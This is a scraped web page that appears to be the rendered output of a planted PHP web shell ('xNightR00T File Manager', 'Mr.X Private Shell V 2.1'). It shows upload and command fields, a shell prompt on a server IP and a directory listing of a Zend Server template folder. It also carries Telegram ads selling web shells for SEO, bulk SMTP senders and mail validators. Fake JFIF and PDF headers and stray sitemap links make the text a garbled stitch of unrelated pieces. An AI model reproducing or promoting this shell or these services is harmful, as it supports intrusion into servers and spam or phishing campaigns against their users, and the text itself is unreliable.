xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<div class="JobsTable" ng-if="!row.jobDetails">
    <i class="fa fa-spinner fa-spin"></i> Loading...
</div>
<div class="JobsTable" ng-if="row.jobDetails">
    <ul class="tabs">
        <li class="tab first" ng-class="{active: row.currentTab === 'details'}" ng-click="row.currentTab = 'details'">Details</li>
        <li class="tab" ng-class="{active: row.currentTab === 'variables'}"  ng-if="row.jobDetailsExtra.vars" ng-click="row.currentTab = 'variables'">Variables</li>
        <li class="tab" ng-class="{active: row.currentTab === 'httpHeaders'}" ng-click="row.currentTab = 'httpHeaders'" ng-if="row.jobDetailsExtra.httpHeaders.length > 0">HTTP Headers</li>
        <li class="tab" ng-class="{active: row.currentTab === 'output'}" ng-click="row.currentTab = 'output'" ng-if="row.jobDetailsExtra.output.length > 0">Output</li>
        <li class="tab" ng-class="{active: row.currentTab === 'error'}" ng-click="row.currentTab = 'error'" ng-if="row.jobDetailsExtra.error.length > 0">
            <span ng-if="grid.appScope.jobStatusDescriptor[row.entity.status] == 'Aborted'">Reason</span>
            <span ng-if="grid.appScope.jobStatusDescriptor[row.entity.status] != 'Aborted'">Error</span>
        </li>
        <li class="tab" ng-class="{active: row.currentTab === 'retries'}" ng-click="row.currentTab = 'retries'" ng-if="row.jobDetails.retries && row.jobDetails.retries.length > 0">Retries</li>
    </ul>

    <div class="content" ng-if="row.currentTab === 'details'">
        <ng-include src="'/ZendServer/ModuleResource/JobQueue/templates/table/jobInfo.html'"></ng-include>
    </div>
    <div class="content" ng-if="row.currentTab === 'variables'">
        <div class="content">
            <!-- li class="mui-vars-open"><span class="select-all" entityid="{{row.entity.id}}" onclick="fnSelect('variables-' + this.getAttribute('entityid'))" >[select all]</span></li-->
            <a title="Copy to clipboard" ngclipboard  ngclipboard-success="grid.appScope.onClipboardCopySuccess()" ngclipboard-error="grid.appScope.onClipboardCopyError(row.jobDetailsExtra.vars_source)" data-clipboard-text="{{row.jobDetailsExtra.vars_source}}" ng-click="$event.stopPropagation();">
                Copy to clipboard<i class="glyphicons glyphicons-sort"></i>
            </a>
            <ul id="variables-{{row.entity.id}}"><li ng-bind-html="row.jobDetailsExtra.vars_ui | prettyJSON"></li></ul>
        </div>
    </div>
    <div class="content" ng-if="row.currentTab === 'httpHeaders'">
        <div class="content">
            <a title="Copy to clipboard" ngclipboard  ngclipboard-success="grid.appScope.onClipboardCopySuccess()" ngclipboard-error="grid.appScope.onClipboardCopyError(grid.appScope.getJsonText(row, 'httpHeaders_ui'))" data-clipboard-text="{{grid.appScope.getJsonText(row, 'httpHeaders_ui')}}" ng-click="$event.stopPropagation();">
                Copy to clipboard<i class="glyphicons glyphicons-sort"></i>
            </a>
            <div style="margin-top: 16px"></div>
            <pre class="code-section" id="httpHeaders-{{row.entity.id}}" ng-bind-html="row.jobDetailsExtra.httpHeaders_ui | prettyJSON"></pre>
        </div>
    </div>
    <div class="content" ng-if="row.currentTab === 'output'">
        <div class="content">
            <a class="copy-to-clipboard-jobs" title="Copy to clipboard" ngclipboard  ngclipboard-success="grid.appScope.onClipboardCopySuccess()" ngclipboard-error="grid.appScope.onClipboardCopyError(grid.appScope.getJsonText(row, 'output_ui'))" data-clipboard-text="{{grid.appScope.getJsonText(row, 'output_ui')}}" ng-click="$event.stopPropagation();">
                Copy to clipboard<i class="glyphicons glyphicons-sort"></i>
            </a>
            <div style="margin-top: 16px"></div>
            <pre ng-if="grid.appScope.list.getJobType(row.entity.type) == 'cli' || grid.appScope.list.getJobType(row.entity.type) == 'phpcli'" 
                class="shell-section" id="output-{{row.entity.id}}" ng-bind-html="row.jobDetailsExtra.output_ui | prettyJSON"></pre>
            <pre ng-if="grid.appScope.list.getJobType(row.entity.type) != 'cli' && grid.appScope.list.getJobType(row.entity.type) != 'phpcli'" 
                class="code-section" id="output-{{row.entity.id}}" ng-bind-html="row.jobDetailsExtra.output_ui | prettyJSON"></pre>
        </div>
    </div>
    <div class="content" ng-if="row.currentTab === 'error'">
        <div class="content">
            <a title="Copy to clipboard" ngclipboard  ngclipboard-success="grid.appScope.onClipboardCopySuccess()" ngclipboard-error="grid.appScope.onClipboardCopyError(row.jobDetailsExtra.error)" data-clipboard-text="{{row.jobDetailsExtra.error}}" ng-click="$event.stopPropagation();">
                Copy to clipboard<i class="glyphicons glyphicons-sort"></i>
            </a>
            <div style="margin-top: 35px"></div>
            <pre class="job-error-line" ng-bind-html="row.jobDetailsExtra.error" id="error-{{row.entity.id}}"></pre>
        </div>
    </div>
    <div class="content" ng-if="row.currentTab === 'retries'">
        <ng-include src="'/ZendServer/ModuleResource/JobQueue/templates/table/jobRetries.html'"></ng-include>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
expanded.html File 5.12 KB 0644
jobActionsCol.html File 445 B 0644
jobInfo.html File 1.83 KB 0644
jobRetries.html File 1.04 KB 0644
queue.html File 1.88 KB 0644
queuesActionsCol.html File 733 B 0644
recurringJobActionsCol.html File 1.84 KB 0644
recurringJobExpanded.html File 2.71 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml